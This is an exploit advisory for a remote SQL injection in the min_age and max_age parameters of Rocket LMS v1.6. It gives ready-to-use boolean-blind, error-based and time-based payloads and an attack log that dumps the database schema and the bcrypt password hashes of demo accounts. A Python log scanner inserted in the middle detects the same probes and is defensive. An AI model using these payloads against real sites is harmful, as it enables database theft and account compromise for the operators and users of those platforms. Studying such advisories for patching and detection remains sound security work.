┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                      [ Exploits ]                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                        │ │                                         :
│  Website  : rocket-soft.org                │ │ Rocket LMS - Learning Management System │
│  Vendor   : RocketSoft                     │ │                                         │
│  Software : Rocket LMS v 1.6               │ │ is an online course marketplace with a  │
│  Vuln Type: Remote SQL Injection           │ │ pile of features that helps you to run  │
│  Method   : GET                            │ │ your online education business easily   │
│  Impact   : Database Access                │ │                                         │
│                                            │ │                                         │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise.                                                                    │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL
    Ivo @palaziv
    CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                    © CraCkEr 2022                                    ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'min_age' is vulnerable

---
Parameter: min_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=
---


GET parameter 'max_age' is vulnerable

---
Parameter: max_age (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=
---
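As an added defender-side example (not part of the advisory or of Rocket LMS itself), the check below scans constructed Apache access-log lines for the pattern both findings share: integer-only filter parameters such as min_age and max_age arriving with anything other than a bare integer. The /classes path, the log lines and the exact parameter set are assumptions; the second sample line embeds the boolean-blind probe quoted above for min_age, URL-encoded as a client would send it.

```python
from urllib.parse import urlsplit, parse_qs

# Query parameters Rocket LMS 1.6 should only ever receive as plain integers
# (names taken from the request shown in the advisory; the set is an assumption).
NUMERIC_PARAMS = {"min_age", "max_age", "min_price", "max_price", "category_id", "country_id"}


def non_integer_params(request_target):
    """Return (name, value) pairs of integer-only parameters carrying a non-integer value.

    Empty values are accepted because the application itself sends e.g. 'min_price='
    to mean "no filter".
    """
    query = urlsplit(request_target).query
    flagged = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name not in NUMERIC_PARAMS:
            continue
        for value in values:
            value = value.strip()
            if value and not value.lstrip("-").isdigit():
                flagged.append((name, value))
    return flagged


def flagged_requests(log_lines):
    """Scan Apache common/combined-format lines; return (client_ip, hits) for suspect requests."""
    results = []
    for line in log_lines:
        parts = line.split('"')
        if len(parts) < 2:
            continue
        request = parts[1].split(" ")  # e.g. ['GET', '/classes?min_age=18', 'HTTP/1.1']
        if len(request) != 3:
            continue
        hits = non_integer_params(request[1])
        if hits:
            results.append((line.split(" ", 1)[0], hits))
    return results


# Constructed sample log lines (not from the advisory). Line 1 is a normal filter request,
# line 2 carries the advisory's boolean-blind probe for 'min_age', line 3 is unrelated traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2022:10:00:00 +0000] "GET /classes?sort=top_rate&min_age=18&max_age=99&day[]=saturday HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2022:10:00:03 +0000] "GET /classes?sort=top_rate&min_price=&min_age=(SELECT%20(CASE%20WHEN%20(8536%3D8536)%20THEN%2018%20ELSE%20(SELECT%207625%20UNION%20SELECT%201202)%20END))&max_age=99 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2022:10:00:05 +0000] "GET /blog HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client_ip, hits in flagged_requests(SAMPLE_LOG):
        print(client_ip, hits)
```

The same integer-only rule applied server-side (reject or cast before the value reaches the query) is the fix; the scanner only shows how narrow the legitimate input space for these parameters is.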

[+] Starting the Attack

[INFO] fetching current database
[INFO] the back-end DBMS is MySQL
web application technology: Apache 2, PHP 7.4.30
back-end DBMS: MySQL >= 5.6

current database: 'admin_learn'


[INFO] fetching tables for database: 'admin_learn'

Database: admin_learn
[184 tables]


[INFO] fetching columns for table 'users' in database 'admin_learn'

Database: admin_learn
Table: users
[49 columns]

+--------------------+-------------------------------------+
| Column             | Type                                |
+--------------------+-------------------------------------+
| language           | varchar(255)                        |
| about              | text                                |
| access_content     | tinyint(1)                          |
| account_id         | varchar(128)                        |
| account_type       | varchar(128)                        |
| address            | varchar(255)                        |
| affiliate          | tinyint(1)                          |
| avatar             | varchar(255)                        |
| avatar_settings    | varchar(255)                        |
| ban                | tinyint(1)                          |
| ban_end_at         | int(10) unsigned                    |
| ban_start_at       | int(10) unsigned                    |
| bio                | varchar(128)                        |
| can_create_store   | tinyint(1)                          |
| certificate        | varchar(128)                        |
| city_id            | int(10) unsigned                    |
| commission         | int(10) unsigned                    |
| country_id         | int(10) unsigned                    |
| cover_img          | varchar(255)                        |
| created_at         | int(11)                             |
| deleted_at         | int(11)                             |
| district_id        | int(10) unsigned                    |
| email              | varchar(255)                        |
| facebook_id        | varchar(255)                        |
| financial_approval | tinyint(1)                          |
| full_name          | varchar(128)                        |
| google_id          | varchar(255)                        |
| headline           | varchar(255)                        |
| iban               | varchar(128)                        |
| id                 | int(10) unsigned                    |
| identity_scan      | varchar(128)                        |
| level_of_training  | bit(3)                              |
| location           | point                               |
| meeting_type       | enum('all','in_person','online')    |
| mobile             | varchar(32)                         |
| newsletter         | tinyint(1)                          |
| offline            | tinyint(1)                          |
| offline_message    | text                                |
| organ_id           | int(11)                             |
| password           | varchar(255)                        |
| province_id        | int(10) unsigned                    |
| public_message     | tinyint(1)                          |
| remember_token     | varchar(255)                        |
| role_id            | int(10) unsigned                    |
| role_name          | varchar(64)                         |
| status             | enum('active','pending','inactive') |
| timezone           | varchar(255)                        |
| updated_at         | int(11)                             |
| verified           | tinyint(1)                          |
+--------------------+-------------------------------------+


[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'

Database: admin_learn
Table: users
[4 entries]

+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| id   | account_id    | account_type        | email                       | password                                                     |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+
| 1    | NULL          | NULL                | admin@demo.com              | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |
| 867  | NULL          | NULL                | organization@demo.com       | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |
| 995  | NULL          | NULL                | student@demo.com            | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |
| 1015 | NULL          | NULL                | instructor@demo.com         | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |
+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+


[-] Done